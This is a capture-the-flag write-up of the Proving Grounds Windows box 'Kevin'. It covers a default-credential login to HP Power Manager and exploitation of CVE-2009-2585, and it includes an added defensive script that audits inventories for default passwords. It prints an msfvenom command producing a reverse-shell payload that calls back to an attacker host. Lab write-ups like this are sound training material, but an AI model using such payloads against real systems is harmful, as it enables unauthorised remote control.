Kevin
Source: Proving Grounds OS: Windows Community Rating: Easy
Enumeration & Reconnaissance
Started autorecon and got flooded with open ports: 80, 135, 139, 445, 3389, 49152 -> 49159
Naturally, I started with my favorite, HTTP (80).
Gaining Initial Access
I was greeted by an HP Power Manager login page.

Out of pure muscle memory, I typed admin:admin, and boom, it worked. After a quick poke around that ended with nothing, I searched for exploits and found CVE-2009-2585.
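The default admin:admin login above is the kind of finding a defender can catch before an attacker does. The following is an added example, not part of the original writeup: a small audit that scans a credential inventory export for accounts still set to vendor defaults. The inventory records, the host addresses and every default pair other than admin:admin are constructed sample data.

```python
"""Audit a credential inventory for vendor default logins.

Added example, not code from the original writeup. The inventory and the
default-credential list below are constructed; only admin:admin comes from
the page (it worked against HP Power Manager there).
"""

# Vendor defaults to flag. Usernames are compared case-insensitively,
# passwords exactly. Pairs other than admin:admin are constructed examples.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("administrator", ""),
}

# Constructed inventory export: one record per management interface.
SAMPLE_INVENTORY = [
    {"host": "10.0.0.5", "service": "HP Power Manager",
     "username": "admin", "password": "admin"},
    {"host": "10.0.0.6", "service": "HP Power Manager",
     "username": "Admin", "password": "S3cure-long-passphrase"},
    {"host": "10.0.0.7", "service": "UPS console",
     "username": "Administrator", "password": ""},
]


def uses_default_credentials(username, password, defaults=DEFAULT_CREDENTIALS):
    """True if (username, password) matches a known vendor default."""
    normalised = {(u.lower(), p) for u, p in defaults}
    return (username.strip().lower(), password) in normalised


def audit_inventory(inventory, defaults=DEFAULT_CREDENTIALS):
    """Return the inventory records whose credentials are vendor defaults."""
    return [
        record for record in inventory
        if uses_default_credentials(record["username"], record["password"], defaults)
    ]


if __name__ == "__main__":
    for hit in audit_inventory(SAMPLE_INVENTORY):
        print(f"{hit['host']} ({hit['service']}): "
              f"default credentials still set for user {hit['username']!r}")
```

Run it against a real export (the record format is an assumption) and every hit is a login that works with no exploit at all; rotating those is cheaper than any patch cycle.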

Exploitation
To use this CVE, I needed a payload. So, I generated one with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' -e x86/alpha_mixed --platform windows -f python

Replaced the payload in the PoC and ran it, instant shell! And the best part? No privilege escalation needed. The exploit gave me SYSTEM straight away. Easiest win ever.

Privilege Escalation
None required; I was already SYSTEM upon initial access.
Lessons Learned
Check for CVEs